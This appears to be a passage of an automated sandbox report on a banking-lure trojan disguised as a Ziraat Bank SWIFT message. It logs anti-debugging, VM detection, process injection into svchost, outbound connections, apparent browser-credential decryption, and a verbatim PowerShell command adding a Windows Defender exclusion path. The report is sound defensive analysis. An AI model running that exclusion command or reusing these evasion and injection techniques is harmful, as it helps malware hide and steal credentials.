Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7472	Thread sleep time: -277380000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 7356	Thread sleep count: 34 > 30
Source: C:\Windows\SysWOW64\svchost.exe TID: 7900	Thread sleep time: -90000s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exe TID: 7884	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe TID: 7972	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 8160	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_000C6CA9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_000C60DD
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_000C63F9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000CF56F FindFirstFileW,FindClose,	0_2_000CF56F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_000CF5FA
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_000D1B2F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_000CEB60
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_000D1C8A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_000D1F94
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_00906CA9 GetFileAttributesW,FindFirstFileW,FindClose,	2_2_00906CA9
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_009060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	2_2_009060DD
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_009063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	2_2_009063F9
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_0090F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_0090F5FA
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_0090F56F FindFirstFileW,FindClose,	2_2_0090F56F
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_00911B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00911B2F
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_0090EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_0090EB60
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_00911C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00911C8A
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_00911F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00911F94

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_0009DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0009DDC0

Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99780	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99671	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99562	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99452	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99343	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99230	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99080	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98888	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98636	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98062	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97640	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97500	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97374	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97265	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97145	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 97015	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96888	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96780	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96661	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96546	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96218	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96109	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 96000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95781	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95671	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95558	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95453	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95266	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 95106	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94873	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94317	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94184	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 94078	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93968	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93859	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93749	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93640	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93531	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93421	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 93312	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99874	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99632	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99530	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99422	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99312	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 99094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98969	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98860	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 98735	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 60000
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Source: svchost.exe, 00000022.00000002.1575903926.00000000032DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: svchost.exe, svchost.exe, 00000022.00000003.1573768980.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.1575866275.00000000032BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000022.00000002.1575511280.0000000003256000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: wscript.exe, 00000019.00000002.1404289962.00000135B0E65000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: aut8747.tmp.0.dr	Binary or memory string: VMCi'
Source: Lityerses.0.dr, autCC4E.tmp.29.dr, aut8747.tmp.0.dr	Binary or memory string: aqEmU
Source: neworigin.exe, 0000000D.00000002.3711624475.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: server02.exe, 0000000C.00000002.3708584872.0000000000A23000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000022.00000003.1573768980.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000022.00000002.1575866275.00000000032BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWackIgnoreDisableDefaultSigsNISSignatureAppliedSignatureUpdateCountNISSignatureLocationNISSignatureVersionNISEngineVersionNISEngineVersionNISSignatureLocationFirstAuGracePeriodFirstAuGrace

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	API call chain: ExitProcess graph end node	graph_0-54546
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	API call chain: ExitProcess graph end node	graph_2-54262
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	API call chain: ExitProcess graph end node	graph_2-54565
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\server02.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000D6AAF BlockInput,

0_2_000D6AAF

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000B375F IsDebuggerPresent,

0_2_000B375F

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000B3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_000B3920

Source: C:\Windows\SysWOW64\svchost.exe

5_2_004019F0

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_0009E01E LoadLibraryA,GetProcAddress,

0_2_0009E01E

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_00E418D0 mov eax, dword ptr fs:[00000030h]	0_2_00E418D0
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_00E42F70 mov eax, dword ptr fs:[00000030h]	0_2_00E42F70
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_00E42F10 mov eax, dword ptr fs:[00000030h]	0_2_00E42F10
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_015D3478 mov eax, dword ptr fs:[00000030h]	2_2_015D3478
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_015D34D8 mov eax, dword ptr fs:[00000030h]	2_2_015D34D8
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_015D1E38 mov eax, dword ptr fs:[00000030h]	2_2_015D1E38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00505394 mov eax, dword ptr fs:[00000030h]	5_2_00505394
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BC3F3D mov eax, dword ptr fs:[00000030h]	5_2_04BC3F3D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04B81130 mov eax, dword ptr fs:[00000030h]	5_2_04B81130
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 26_2_016A7878 mov eax, dword ptr fs:[00000030h]	26_2_016A7878
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 26_2_016A8EB8 mov eax, dword ptr fs:[00000030h]	26_2_016A8EB8
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 26_2_016A8F18 mov eax, dword ptr fs:[00000030h]	26_2_016A8F18
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 29_2_00EAB1C8 mov eax, dword ptr fs:[00000030h]	29_2_00EAB1C8
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 29_2_00EAB228 mov eax, dword ptr fs:[00000030h]	29_2_00EAB228
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 29_2_00EA9B88 mov eax, dword ptr fs:[00000030h]	29_2_00EA9B88
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 31_2_011FDBB0 mov eax, dword ptr fs:[00000030h]	31_2_011FDBB0
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 31_2_011FF250 mov eax, dword ptr fs:[00000030h]	31_2_011FF250
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 31_2_011FF1F0 mov eax, dword ptr fs:[00000030h]	31_2_011FF1F0
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 33_2_00D16E78 mov eax, dword ptr fs:[00000030h]	33_2_00D16E78
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 33_2_00D18518 mov eax, dword ptr fs:[00000030h]	33_2_00D18518
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 33_2_00D184B8 mov eax, dword ptr fs:[00000030h]	33_2_00D184B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_00505394 mov eax, dword ptr fs:[00000030h]	34_2_00505394
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_04E93F3D mov eax, dword ptr fs:[00000030h]	34_2_04E93F3D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_04E51130 mov eax, dword ptr fs:[00000030h]	34_2_04E51130

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Code function: 0_2_000BB1CC GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,

0_2_000BB1CC

Source: C:\Windows\SysWOW64\svchost.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000A8189 SetUnhandledExceptionFilter,	0_2_000A8189
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: 0_2_000A81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_000A81AC
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008E8189 SetUnhandledExceptionFilter,	2_2_008E8189
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008E81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_008E81AC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0040CE09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_0040E61C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00416F6A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004123F1 SetUnhandledExceptionFilter,	5_2_004123F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BC4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_04BC4C7B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BC1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_04BC1361
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	34_2_0040CE09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	34_2_0040E61C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_00416F6A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_004123F1 SetUnhandledExceptionFilter,	34_2_004123F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_04E94C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	34_2_04E94C7B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_04E91361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_04E91361

Source: C:\Windows\SysWOW64\svchost.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 54.244.188.177 80
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 18.141.10.107 80

.NET source code references suspicious native API functions

Source: server02.exe.5.dr, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: server02.exe.5.dr, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: server02.exe.5.dr, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
Source: 5.2.svchost.exe.6f05570.4.raw.unpack, Ljq6xD21ACX.cs	Reference to suspicious API methods: OZkujShDCVG.OpenProcess(aPNZ30.DuplicateHandle, bInheritHandle: true, (uint)snUp2.ProcessID)

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 9F1008			Jump to behavior
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2F1C008

